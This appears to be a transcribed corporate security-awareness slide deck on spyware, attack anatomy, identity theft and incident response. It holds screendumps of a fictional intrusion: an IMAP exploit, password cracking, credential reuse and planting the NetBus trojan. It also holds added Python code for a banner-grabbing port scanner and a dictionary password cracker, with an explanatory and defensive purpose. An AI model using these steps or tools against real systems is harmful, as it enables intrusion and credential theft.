Designing a Secure Organization

Agenda
• Where are we today?
• What is the Problem?
• 2002-2004 Security Statistics
• Common Threats
• Identity Theft
• Anatomy of Attack
• Incident Response & Forensics
• Fixing The Problem
Blended Threats: A Deadly Combination
• Blended threats combine hacking, denial of service, and worm-like propagation
• Can rapidly compromise millions of machines
• Often spread without human interaction
• Why they matter:
  • Create confidentiality breaches
  • Corrupt system integrity
  • Impact availability of data and systems, compromising patient care
Examples shown on the slide: sadmind, CodeRed, Klez, Blaster, Nimda, BugBear
What is Spyware?
• Spyware is a non-viral application (a surveillance tool) that is loaded without the user’s knowledge and can monitor computer activity in the manner of a Trojan, including:
  • Keystroke tracking and capture
  • Email logging
  • Instant messaging usage and snapshots
  • Modifying application/OS behavior (e.g. CoolWebSearch)
• Spyware and adware increase business risk through:
  • Theft of confidential data
  • Unauthorized enterprise access
  • Reduced PC performance
  • Wasted bandwidth
How do People Get Infected?
• Web browsing
• Unauthorized downloads
• File swapping
• Email attachments
• Instant messaging
• Installing “legitimate software” (malicious mobile code)
The Problem is Growing
Chart: number of spyware reports per month, Dec 03 through Sept 04, on a scale of 0 to 1,500,000 (the May 04 and June 04 values are estimates of average monthly increase). Source: CA Security Advisory Team, Center for Pest Research
Gartner Confirms the Spyware Threat
“At mid-2004, Gartner customers are seeing a surge in manifestations of ‘spyware,’ invasive methods to steal user privacy that disrupt users and their workstations at home and at work. Customers report that the cleanup effort may take a few hours, but that in no time at all, the same systems are infected again.”
Spyware Will Cost You Time and Money
• Microsoft estimates that spyware is responsible for 50% of all PC crashes
• Dell reports 20% of its technical support calls involve spyware
Sources: InformationWeek, “Tiny, Evil Things,” George Hulme and Thomas Claburn, April 26, 2004; Dell press release, http://www1.us.dell.com/content/topics/global.aspx/corp/pressoffice/en/2004/2004_07_20_rr_000?c=us&l=en&s=dhs&cs=19
The Effect of Spyware
Spyware (overt)
• Gains a remote control capability, which includes searching and reading local files
• Has a self-updating capability
• Often includes a network sniffer
• Can usually activate the webcam or microphone
• Usually logs all keystrokes
Hijackers
• Modify content of web pages
• Block access to websites
• Redirect users to unintended websites
• Install hidden/backdoor processes and services that are tightly bound to the OS
• Disrupt websites used for mission-critical applications
Adware and cookies
• Track user activity on the Internet
• Collect personal information
Pop-up ads
• Collect information for cookies
• Interrupt user transactions on the Internet
• Flood users with ads and freeze machines
• Install utilities that modify user services
(The slide arranges these categories along a scale from security threat to system degradation.)
Anti-Spyware Business Drivers
• Mitigate risk and limit legal liability
  • Protect from unauthorized access and information theft
  • Reduce threat to employees, partners, customers, intellectual property, regulatory compliance and brand
• Help ensure business continuity
  • Maintain employee productivity
  • Avoid business disruptions and system downtime
  • Reduce bandwidth waste
• Reduce costs
  • Lack of resources to research new threats
  • Minimize help desk calls due to spyware infestation
  • Costly impact of spyware-infested machines (time and money)
Anti-Spyware Complements Traditional Methods
Diagram listing the threat types the combined defenses must cover: viruses, worms, Trojans, buffer overflows, IE exploits, Outlook exploits; spyware, adware, hacker tools, distributed denial-of-service zombies, keyloggers, Trojans; hack in progress, routed attack, port scan.
Security Statistics
• General Internet attack trends show a 64% annual rate of growth (Symantec)
• The average company experiences 32 cyber-attacks per week (Check Point)
• The average measurable cost of a serious security incident in Q1/Q2 2004 was approximately $500,000 (UK Department of Trade & Industry)
• Personal information for identity theft sells for $500-$1,000 per record (CFE Resource)
• An average of 79 new vulnerabilities per week in 2004 (eEye Digital Security)
Statistics from the FBI & Interpol on hacking
According to the 2003 Computer Security Institute survey:
• 90% of companies had security breaches in the past 12 months
• 80% acknowledged financial losses as a result
• 40% detected denial of service attacks
• 40% detected system penetration from outside
• 33% detected internal attack sources
The most serious and expensive losses were of proprietary information. Yet these companies seem to be doing all the right things when it comes to information security:
• 90% use anti-virus software
• 89% use firewalls
• 60% use intrusion detection systems
More Security Statistics
• More vulnerabilities = higher likelihood of attack
• Faster attack propagation = less time to react
Common Threats
• Hackers – “script kiddies”
• Employees – former and disgruntled
• Domestic competitors – “competitive intelligence”
• State-sponsored and corporate espionage
• Extremists – Earth Liberation Front (ELF)
(Slide graphics: ELF logo; Federal'naya Sluzhba Bezopasnosti)
Common Threats (Continued)
• Physical – equipment, machinery, mines, office buildings, soft targets
• Personnel – unfettered access to network information resources, elicitation techniques, defamation of character/slander
• Network/information assets – network access, database and file access, web server, mail server
Anatomy of Attack
• Modus operandi
  • Physical penetrations
  • Company profiling – open source research
  • Footprinting – scanning – enumeration – penetration – escalate privilege – stealing/damaging corporate information
  • Trojans – remote controlling systems
  • Buffer overflows
  • Known exploits
  • Port redirection of packets
  • Zone transfers
  • SNMP sweeps
  • Router exploitation
  • Key loggers – software and hardware devices
  • Denial of service
Anatomy of Attack (Continued)
• Physical penetrations
  • Surveillance
  • Dumpster diving
  • Impersonation of authorized personnel
Company profiling – whois lookup (slide screenshot):

Registrant:
Big Widget, Inc. (BIGWIDGET_DOM)
1111 Big Widget Drive
Really Big, CA 90120
US

Domain Name: BIGWIDGET.NET

Administrative Contact, Technical Contact:
Simms, Haywood (HS69)  hsimms@BIGWIDGET.NET
1111 Big Widget Drive, UMIL04-07
Really Big, CA 90210
678-443-6001

Zone Contact, Billing Contact:
Dodge, Rodger (RD32)  rdodge@BIGWIDGET.NET
1111 Big Widget Drive, UMIL04-47
Really Big, CA 90210
678-443-6014

Record last updated on 24-June-2000
Record expires on 20-Mar-2010
Record created on 14-Mar-1998
Database last updated on 7-Jun-2000 15:54

Domain servers in listed order:
EHECATL.BIGWIDGET.NET    10.1.1.53
NS1-AUTH.SPRINTLINK.NET  206.228.179.10
NS.COMMANDCORP.COM       130.205.70.10
Scanning and enumeration – banner grabbing the mail server (slide screenshot):

hacker:~$ telnet mail.bigwidget.net 25
Trying 10.1.1.10...
Connected to mail.bigwidget.net.
Escape character is '^]'.
Connection closed by foreign host.
hacker:~$ telnet mail.bigwidget.net 143
Trying 10.1.1.10...
Connected to mail.bigwidget.net.
Escape character is '^]'.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to MRC@CAC.Washington.EDU)
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.
Penetration – exploiting the IMAP server and logging in as root (slide screenshot):

hacker:~$ ./imap_exploit mail.bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius (aky@galeb.etf.bg.ac.yu)
Modifications: p1 (p1@el8.org)
Completed successfully.
hacker:~$ telnet mail.bigwidget.com
Trying 10.1.1.10...
Connected to mail.bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
login: root
bigwidget:~# whoami
root
bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1  localhost localhost.localdomain
10.1.1.9   thevault   accounting
10.1.1.11  fasttalk   sales
10.1.1.12  geekspeak  engineering
10.1.1.13  people     human resources
10.1.1.14  thelinks   marketing
10.1.1.15  thesource  information systems
Stealing information, cracking passwords and reusing them on the next host (slide screenshot):

bigwidget:~# cd /data/creditcards
bigwidget:~# cat visa.txt
Allan B. Smith    6543-2223-1209-4002  12/99
Donna D. Smith    6543-4133-0632-4572  06/98
Jim Smith         6543-2344-1523-5522  01/01
Joseph L. Smith   6543-2356-1882-7532  04/02
Kay L. Smith      6543-2398-1972-4532  06/03
Mary Ann Smith    6543-8933-1332-4222  05/01
Robert F. Smith   6543-0133-5232-3332  05/99
bigwidget:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman  password: nambob
username: jsmith  password: redbirds
username: root    password:
bigwidget:~# ftp thesource
Connected to thesource
220 thesource Microsoft FTP Service (Version 4.0).
Name: jsmith
331 Password required for jsmith.
Password: ********
230 User jsmith logged in.
Remote system type is Windows_NT.
Uploading and launching the NetBus Trojan on the second host (slide screenshot):

ftp> cd \temp
250 CWD command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer complete.
ftp> quit
thevault:~$ telnet thesource
Trying 10.1.1.15...
Connected to thesource.bigwidget.com.
Escape character is '^]'.
Microsoft (R) Windows 2000
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login: jsmith
password: ********
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\> cd \temp
C:\TEMP> netbus.exe
Remote control and the attacker’s message (slide screendump):

NetBus 1.6, by cf – Connected to the.source.bigwidget.com

From: Postmaster <postmaster@bigwidget.com>
To: David Smith; Bigwidge@bigwidget.com; Finance@BigWidget.com
Subject: Greetings <URGENT>

Greetings Bigwidget employees:
I have officially compromised your entire system, and have obtained all of your accounting information.
Yours Truly,
Friendly Hacker
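The scanning and enumeration steps of the walkthrough (connect to a port, read the greeting, note the product and version) as an added Python example; this is not code from the original slides. It connect-scans a port list, reads the first line each service sends, and parses product and version out of IMAP, SMTP and Microsoft FTP greetings with regexes that are this example's own. So that it runs offline it starts a fake IMAP server on localhost whose greeting is copied from the walkthrough, and it also handles the two cases a scanner must distinguish: a closed port, and a port that accepts and then closes without speaking (what port 25 did above).

```python
"""Connect scan plus banner grab (added example, not from the original slides).

Models the scanning and enumeration steps of the attack walkthrough: connect to
a port, read the service greeting, and parse product and version out of it.
Runs offline against an in-process fake IMAP server whose greeting is copied
from the walkthrough; the regexes and helper names are this example's own.
"""
import re
import socket
import threading

# Constructed greeting, modelled on the IMAP banner in the walkthrough
FAKE_IMAP_GREETING = (
    b"* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) "
    b"(Report problems in this server to MRC@CAC.Washington.EDU)\r\n"
)

# (service, regex) pairs; each regex captures (product, version)
BANNER_PATTERNS = [
    ("imap", re.compile(r"^\* OK \S+ (IMAP4rev1) Service (\S+)")),
    ("smtp", re.compile(r"^220 \S+ E?SMTP (\S+) (\S+)")),
    ("ftp", re.compile(r"^220 .*?(Microsoft FTP Service) \(Version ([\d.]+)\)")),
]


def parse_banner(banner):
    """Return (service, product, version) for a recognised greeting, else None."""
    for service, pattern in BANNER_PATTERNS:
        m = pattern.search(banner)
        if m:
            return service, m.group(1), m.group(2)
    return None


def grab_banner(host, port, timeout=2.0):
    """TCP connect and read the first greeting line.

    Returns None if the port is closed (or the connect times out), "" if the
    server accepted and then closed without speaking (the port-25 behaviour in
    the walkthrough), otherwise the first line of the greeting.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            buf = b""
            while b"\n" not in buf and len(buf) < 4096:
                chunk = s.recv(1024)
                if not chunk:          # peer closed the connection
                    break
                buf += chunk
    except OSError:                    # refused, reset, or timed out
        return None
    return buf.decode("ascii", "replace").split("\r\n", 1)[0].rstrip("\n")


def scan(host, ports):
    """Connect-scan the ports; map port -> parsed banner, raw banner, or None if closed."""
    results = {}
    for port in ports:
        banner = grab_banner(host, port)
        results[port] = None if banner is None else (parse_banner(banner) or banner)
    return results


def start_fake_imap_server():
    """Serve FAKE_IMAP_GREETING on an ephemeral localhost port; returns the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.sendall(FAKE_IMAP_GREETING)

    threading.Thread(target=serve, daemon=True).start()
    return port


def closed_port():
    """Reserve and release an ephemeral port so the caller has one that is closed."""
    tmp = socket.socket()
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


if __name__ == "__main__":
    imap_port = start_fake_imap_server()
    print(scan("127.0.0.1", [imap_port, closed_port()]))
```

The version string is the whole point of the enumeration step: in the walkthrough it is what let the attacker pick a matching exploit, and it is also what a defender's own scan of the perimeter should be comparing against the patch level of each host.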
Anatomy of Attack (Continued)
Diagram: the attack path through the network – router, firewall, the web, FTP, IMAP and NetBus hosts, and the clients & workstations.
Anatomy of Attack (Continued) – Malicious Code

W32.Welchia.Worm
• Attempts to download the DCOM RPC patch from Microsoft's Windows Update Web site, install it, and then reboot the computer.
• Checks for active machines to infect by sending an ICMP echo request (PING), which results in increased ICMP traffic.
• Attempts to remove W32.Blaster.Worm.
• Payload: deletes msblast.exe. Causes system instability: vulnerable Windows 2000 machines experience system instability due to the RPC service crash. Compromises security settings: installs a TFTP server on all infected machines.

W32.Blaster.Worm
• A worm that exploits the DCOM RPC vulnerability using TCP port 135.
• Payload trigger: from the 16th of the month until the end of that month if it is before August, and every day from August 16 until December 31.
• Payload: performs a denial of service against windowsupdate.com. Causes system instability: may cause machines to crash. Compromises security settings: opens a hidden remote cmd.exe shell.
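Both worms announce themselves by how they look for victims: Blaster hammers TCP/135 across many hosts, Welchia pings many hosts first. The following added Python example (not from the original slides) turns that into detection logic over firewall log lines. The log format ("timestamp src dst proto dport", with "echo" as the ICMP pseudo-port), the thresholds and the sample lines are all assumptions constructed for the example. It counts distinct destinations per source inside a sliding time window, so a server that legitimately receives DCOM traffic from one client never trips it, and it shows the limit of the approach: a sweep slow enough to stay under the per-window threshold goes unnoticed unless the window is widened.

```python
"""Worm-sweep detector over firewall log lines (added example, not from the original slides).

Looks for the two propagation signatures the slide describes: one source
probing TCP/135 on many distinct hosts (Blaster-like) and one source sending
ICMP echo requests to many distinct hosts (Welchia-like). The log format
("timestamp src dst proto dport") is assumed for the example, and the sample
lines are constructed, not captured.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# signature name -> predicate over (proto, dport)
SIGNATURES = {
    "blaster-like TCP/135 sweep": lambda proto, dport: proto == "tcp" and dport == "135",
    "welchia-like ICMP echo sweep": lambda proto, dport: proto == "icmp" and dport == "echo",
}


def parse_line(line):
    """'2003-08-12T10:00:01 src dst proto dport' -> (datetime, src, dst, proto, dport)."""
    ts, src, dst, proto, dport = line.split()
    return datetime.fromisoformat(ts), src, dst, proto, dport


def detect_sweeps(lines, threshold=10, window_seconds=60):
    """Return [(signature, src, distinct_targets)] for every source that touches
    at least `threshold` distinct destinations within any `window_seconds`
    window, counted separately per signature. One alert per (signature, src).
    Repeated traffic to a single destination never trips it."""
    events = sorted(parse_line(l) for l in lines if l.strip())
    recent = {name: defaultdict(deque) for name in SIGNATURES}  # name -> src -> deque[(ts, dst)]
    window = timedelta(seconds=window_seconds)
    alerts, alerted = [], set()
    for ts, src, dst, proto, dport in events:
        for name, matches in SIGNATURES.items():
            if not matches(proto, dport):
                continue
            q = recent[name][src]
            q.append((ts, dst))
            while ts - q[0][0] > window:      # drop probes older than the window
                q.popleft()
            distinct = len({d for _, d in q})
            if distinct >= threshold and (name, src) not in alerted:
                alerted.add((name, src))
                alerts.append((name, src, distinct))
    return alerts


def build_sample_log():
    """Constructed sample: a fast TCP/135 sweep, an ICMP echo sweep, benign
    repeated DCOM traffic to one server, and a slow sweep (30 s between probes)
    that stays under the threshold inside a 60 s window."""
    base = datetime(2003, 8, 12, 10, 0, 0)
    t = lambda s: (base + timedelta(seconds=s)).isoformat()
    lines = []
    lines += [f"{t(2 * i)} 10.1.1.50 10.1.2.{i + 1} tcp 135" for i in range(15)]
    lines += [f"{t(i)} 10.1.1.60 10.1.3.{i + 1} icmp echo" for i in range(12)]
    lines += [f"{t(5 * i)} 10.1.1.9 10.1.1.15 tcp 135" for i in range(12)]
    lines += [f"{t(30 * i)} 10.1.1.70 10.1.4.{i + 1} tcp 135" for i in range(12)]
    return lines


if __name__ == "__main__":
    for alert in detect_sweeps(build_sample_log()):
        print(alert)
```

With the defaults the fast TCP/135 and ICMP sweeps alert and the other two sources stay quiet; raising the window to 600 s with a threshold of 12 also catches the slow sweep, at the cost of more state per source.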
Anatomy of Attack (Continued) – Nmap
• Nmap (Network Mapper) is an open source, freely distributed port scanner.
• Designed to scan large networks rapidly.
• Can be used to target specific services.
• Includes features to evade intrusion detection.
• Uses TCP/IP stack fingerprinting to identify the remote operating system.
Anatomy of Attack (Continued) – Netcat, “The TCP/IP Swiss Army Knife”
• Create outbound or receive inbound TCP or UDP connections
• Feature-rich network debugging and “exploration” tool
• Port scanning
• Remote “backdoor” shell
• SYN bombing – denial of service attacks
• Cryptcat – a variant that encrypts its traffic with Twofish
Anatomy of Attack (Continued) – Wireless Tools
Three tools are shown (their names appear only in the slide graphics):
• Wireless network discovery and auditing tool; decodes traffic to provide information about the network; interfaces with GPS to track the locations of discovered networks
• Wireless network discovery tool; displays and tracks information about wireless networks; runs on Microsoft Windows
• Wireless tool that recovers the wireless encryption key; monitors wireless traffic passively
Anatomy of Attack (Continued) – Trojans
• Back Orifice – a powerful “network administrator” tool that is small in size, extensible, and free from the Cult of the Dead Cow (cDc)
  • Keystroke logger
  • Registry editing
  • Redirection of TCP/IP connections
  • File transfers
• SubSeven – an extremely dangerous Trojan that enables full control of the host
  • Erase hard drives
  • Execute programs
Anatomy of Attack (Continued) – L0phtCrack
• Security experts from industry, government, and academia cite weak passwords as one of the most critical Internet security threats.
• In a recent demonstration L0phtCrack obtained 18% of the passwords within 10 minutes.
• 90% of the passwords were recovered within 48 hours on a Pentium II/300.
• LC3 can even sniff the challenge/response exchanged when one machine authenticates to another over the network and recover the password from it.
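The "crack /etc/passwd" step of the walkthrough and the weak-password point of this slide come down to the same offline attack: hash each guess with the stored salt and compare. The following added Python example (not from the original slides) shows why "nambob" for user bobman and a dictionary word like "redbirds" fall immediately: guesses derived from the username are tried first, then a wordlist with the usual mangling. The hash format is a simplified salted SHA-256 ("salt$hexdigest") chosen so the demo is self-contained; it is neither crypt(3) nor the LM/NTLM hashes L0phtCrack attacks, and the wordlist, salts and the root password are constructed for the example.

```python
"""Offline password audit (added example, not from the original slides).

Models the "crack /etc/passwd" step of the walkthrough and the weak-password
point of the L0phtCrack slide. Hash format is a simplified salted SHA-256
("salt$hexdigest") for a self-contained demo; it is not crypt(3) and not the
LM/NTLM hashes L0phtCrack attacks. Users and weak passwords are the ones the
walkthrough revealed; wordlist, salts and the root password are constructed.
"""
import hashlib


def hash_password(password, salt):
    """Simplified salted hash, example format only: '<salt>$<sha256 hex>'."""
    return f"{salt}${hashlib.sha256((salt + password).encode()).hexdigest()}"


def candidates(username, wordlist):
    """Yield guesses in cracker order: username-derived first, then mangled wordlist."""
    seen = set()
    guesses = [username, username[::-1], username.capitalize(), username + "1", username + "123"]
    for word in wordlist:
        guesses += [word, word.capitalize(), word + "1", word[::-1]]
    for guess in guesses:
        if guess not in seen:
            seen.add(guess)
            yield guess


def crack(entries, wordlist):
    """entries: 'user:<salt>$<hash>' lines. Returns {user: recovered password or None}."""
    results = {}
    for line in entries:
        user, stored = line.strip().split(":", 1)
        salt = stored.split("$", 1)[0]          # salt is public; only the guess is secret
        results[user] = next(
            (guess for guess in candidates(user, wordlist) if hash_password(guess, salt) == stored),
            None,
        )
    return results


# Constructed sample: the walkthrough's users, plus a root password not in any list
WORDLIST = ["password", "letmein", "redbirds", "widget"]
SAMPLE_ENTRIES = [
    "bobman:" + hash_password("nambob", "x7"),      # reversed username
    "jsmith:" + hash_password("redbirds", "q2"),    # plain dictionary word
    "root:" + hash_password("c9!Rk2#vLp0", "z4"),   # strong: survives this attack
]


if __name__ == "__main__":
    for user, password in crack(SAMPLE_ENTRIES, WORDLIST).items():
        print(f"{user}: {password if password else '<not recovered>'}")
```

The salt defeats precomputed tables but not this attack, because the guess space is small; the defence is the password itself, which is why the walkthrough's jsmith account, cracked on the Linux mail server, also opened FTP and telnet on the Windows host.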
Anatomy of Attack (Continued) – Tools Used during Attacks
Screenshots (connected to www.test.com) of: NetBus, UltraScan, WinFinger, SATAN, SAINT, Winnuke, Back Orifice, NMAP. In addition to numerous handbooks & tutorials.
WEB of DECEPTION
Man Charged with Using Internet to Steal Millions from Oprah, Spielberg, and Others
NEW YORK, March 20 — A Brooklyn man has been charged with stealing millions from the rich and famous through the Internet, apparently using a public library computer to help him pull off the heist.
Abraham Abdallah, 32, shown here in a police photo released March 20, allegedly masterminded the theft of identities by using computers in a Brooklyn library to obtain credit records of chief executives. (NYPD/Reuters)
Personal Information
• Name
• Address
• Telephone number
• Date of birth
• Driver’s license #
• Identification card #
• Social Security #
• Bank account #
• Utility account #
• Medical record #
• Credit card #
• Cell phone/pager #
• Internet address
Just the facts… Types of identity theft fraud
• Credit card – 42%
• Telephone or utility – 20%
• Bank – 13%
• Employment related – 9%
• Loans – 7%
• Government documents/benefits – 6%
• Medical records – 19%
• Attempted – 10%
How Does Identity Theft Happen? Discovery…
• Applying for a loan/refinance/credit cards
• Sign-in rosters
• Canadian/Netherlands lottery: “You Have WON”
• Free credit report emails
• Email chain letters/pyramid schemes
• “Find out everything on anyone”
• Questionnaires
• Account verification
• Résumés – Social Security numbers/DOB
Specific Warnings…
• eBay and PayPal account verification scams (July 18, 2003): Do not respond to emails from eBay or PayPal that ask for credit information, SSN and other personal data. ITRC is aware that many of these are scams and the country is being blanketed with them currently.
• FTC warning – Do Not Call Registry (confirmed May 9, 2003): Companies and websites have been making deceptive claims that they can register consumers in advance for the FTC's do-not-call list. Two are being sued by the FTC at this time. These sites include Free-Do-Not-Call-List.org and National-Do-Not-Call-List.us. Neither of these is an official governmental site. One of them is even charging a service fee.
• Unauthorized "hospital personnel" asking for info (Sept. 2003): There are scam artists posing as hospital employees (and we can assume this goes on in nursing homes) asking patients to either verify information or to help fill in some blanks. They carry clipboards and may even wear hospital or lab coats. Hospital personnel must be on the lookout for these con artists, and patients (and family members) must require identification prior to giving out any information.
Who to contact…
• Credit card companies
• Bank
• Insurance companies
• Medical providers (hospitals, dental offices)
• Social Security
• Department of Motor Vehicles
• Utility company
• ID Theft Clearinghouse
Prevention…
• Shred any document that contains personal information
• Shred unused credit solicitations
• Request and review your credit report on a regular basis
• NEVER give out personal information unless you initiate the process
• Carefully read documents and question the use of your personal information
Incident Response & Forensic Investigations
Incident Response & Forensic Investigations
• FBI Cyber Crime Division – responsible for criminal investigations of intellectual property, high tech and computer crimes.
• NIPC – detect, deter, assess, warn, respond, and investigate unlawful acts involving computer and information technologies and unlawful acts, both physical and cyber, that threaten or target our critical infrastructures.
• RCCEEG – an organization of law enforcement officers, prosecutors and computer professionals from the region and surrounding counties, dedicated to providing manpower, technical and legal assistance in computer crime education and investigations.
Incident Response & Forensic Investigations – FBI Agent Robert P. Hanssen
• 27-year veteran of the FBI
• Involved in some of the most important counterintelligence cases in recent times
• Aliases shown: “B”, “Ramon Garcia”, “Jim Baker”, “G. Robertson”, “Mr. Diamonds”
• Searched the investigative database
• Hacked into the computer of the FBI’s top Russian counterintelligence chief – caught, but said it was to show the vulnerability of the computer systems